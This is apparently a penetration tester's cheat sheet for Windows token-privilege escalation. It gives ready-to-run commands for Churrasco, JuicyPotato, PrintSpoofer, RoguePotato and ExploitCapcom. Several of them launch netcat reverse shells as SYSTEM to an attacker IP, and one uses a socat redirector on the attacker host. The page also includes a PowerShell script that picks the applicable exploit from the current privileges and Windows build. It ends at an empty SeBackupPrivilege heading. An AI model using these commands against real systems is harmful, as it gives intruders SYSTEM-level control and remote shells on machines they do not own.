windows token exploits

Churrasco

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Windows XP/Vista/2003/2008 (pre-Windows 7 builds only)

# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

HotPotato / JuicyPotato

REQUIREMENTS:

  • SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege

  • Windows 7/8/10, Server 2008, Server 2012 (JuicyPotato no longer works from Windows 10 1809 / Server 2019 on)

# -l : port for the local COM server
# -p : program to launch as SYSTEM, -a : its arguments
# -t * : try both CreateProcessWithTokenW and CreateProcessAsUser
# -c : CLSID of a DCOM server that runs as SYSTEM; valid CLSIDs differ per Windows version, so pick one that matches the target build
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

# lab helper (needs local admin): spawn a shell as LOCAL SERVICE, an account that holds SeImpersonatePrivilege, to test the tools on this page
> PSExec64.exe -i -u "nt authority\local service" <shell.exe>

PrintSpoofer

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Windows 10, Server 2016, Server 2019

  • Print Spooler service running on the target (the exploit abuses its RPC interface)

> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interact with the new process in the current console
# -c : command to run as SYSTEM

RoguePotato

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Windows 10 1809+ / Windows Server 2019 (the builds where JuicyPotato stopped working)

  • a host you control that the target can reach on tcp/135

# attacker box: OXID resolution has to come back on 135, so listen there and forward to RoguePotato's listener on the TARGET (not back to Kali)
$ socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999
# target: -r attacker IP (the redirector), -l port the redirector forwards to, -e command to run as SYSTEM
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
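Picking between the tools above comes down to two checks: does the current token hold an impersonation privilege at all, and which build is the target on. The PowerShell below is an added triage helper written for these notes; it is not part of Churrasco, JuicyPotato, PrintSpoofer or RoguePotato. It parses `whoami /priv` and reads the build number from the registry, then maps them onto the version ranges given in the sections above. The build thresholds are assumptions taken from the OS lists on this page (7600 = Windows 7/2008 R2, 10240 = Windows 10 RTM, 17763 = 1809/Server 2019); the `SeBackupPrivilege` check only flags the privilege and does not implement its abuse.

```powershell
# Added triage helper for this page; not part of any Potato/PrintSpoofer tool.
# Run it in the low-privileged shell you already have (e.g. the LOCAL SERVICE shell from PsExec).

function Get-TokenPrivilegeMap {
    # Parse `whoami /priv` into @{ PrivilegeName = 'Enabled' | 'Disabled' }.
    # Presence in the token is what matters: a Disabled entry can still be enabled
    # with AdjustTokenPrivileges, which is what the tools do before impersonating.
    $map = @{}
    foreach ($line in (whoami /priv)) {
        if ($line -match '^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$') {
            $map[$Matches[1]] = $Matches[2]
        }
    }
    return $map
}

function Get-TokenEscalationCandidates {
    $privs = Get-TokenPrivilegeMap
    # CurrentBuildNumber is present on every Windows build, so no CIM/WMI dependency.
    $build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber
    $canImpersonate = ($privs.ContainsKey('SeImpersonatePrivilege') -or $privs.ContainsKey('SeAssignPrimaryTokenPrivilege'))
    $candidates = New-Object System.Collections.Generic.List[string]

    # Build thresholds are assumptions derived from the OS lists in these notes.
    if ($canImpersonate) {
        if ($build -lt 7600)  { $candidates.Add('Churrasco (XP/2003/Vista/2008)') }
        if ($build -lt 17763) { $candidates.Add('JuicyPotato (needs a CLSID valid for this build)') }
        if ($build -ge 10240) { $candidates.Add('PrintSpoofer (Print Spooler service must be running)') }
        if ($build -ge 17763) { $candidates.Add('RoguePotato (needs the tcp/135 redirector on the attacker host)') }
    }
    if ($privs.ContainsKey('SeBackupPrivilege')) { $candidates.Add('SeBackupPrivilege abuse') }

    [pscustomobject]@{
        Build          = $build
        CanImpersonate = $canImpersonate
        Privileges     = (($privs.Keys | Sort-Object) -join ', ')
        Candidates     = $candidates.ToArray()
    }
}

Get-TokenEscalationCandidates | Format-List
```

An empty `Candidates` list with `CanImpersonate = False` means none of the token exploits on this page apply and you should look at other privileges or misconfigurations instead; a non-empty list is a starting point, not a guarantee, since each tool still has its own runtime requirement (a working CLSID, a running Spooler, reachable port 135).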

ExploitCapcom

REQUIREMENTS:

  • Visual Studio to compile

  • the vulnerable Capcom.sys driver loaded on the target (the exploit talks to that driver; without it there is nothing to abuse)

Steps:

  1. obtain the user's SID (either of the following)

    1. Get-ADUser -Identity 'svc-print' | select SID   # needs the ActiveDirectory module

    2. (New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value   # works without RSAT

  2. generate a reverse shell .exe with msfvenom

  3. update the path to the reverse shell on the target at line 410 of ExploitCapcom.cpp

  4. set the build configuration to Release

  5. Build Solution

  6. run .\ExploitCapcom.exe
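Step 1 above lists two ways to resolve a SID; the PowerShell function below is an added helper (not part of ExploitCapcom) that tries the RSAT-free `NTAccount` translation first and only falls back to `Get-ADUser` when the name cannot be mapped locally and the ActiveDirectory module happens to be present. The account name `svc-print` is the one used in the steps above; the function name and error message are this example's own.

```powershell
# Added helper for step 1 of the ExploitCapcom procedure; not part of the exploit itself.
function Get-UserSid {
    param([Parameter(Mandatory = $true)][string]$Name)
    # NTAccount translation resolves local users, and domain users on a domain-joined
    # host, with no RSAT dependency; Get-ADUser is only a fallback.
    try {
        $acct = New-Object System.Security.Principal.NTAccount($Name)
        return $acct.Translate([System.Security.Principal.SecurityIdentifier]).Value
    } catch {
        if (Get-Command Get-ADUser -ErrorAction SilentlyContinue) {
            return (Get-ADUser -Identity $Name).SID.Value
        }
        throw "Could not resolve SID for '$Name': $($_.Exception.Message)"
    }
}

# usage: resolve the service account named in the steps above
Get-UserSid -Name 'svc-print'
```

If both paths fail, check that the name is spelled exactly as the account (use `DOMAIN\name` for a domain account from a non-joined host) before assuming the account does not exist.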

SeBackupPrivilege
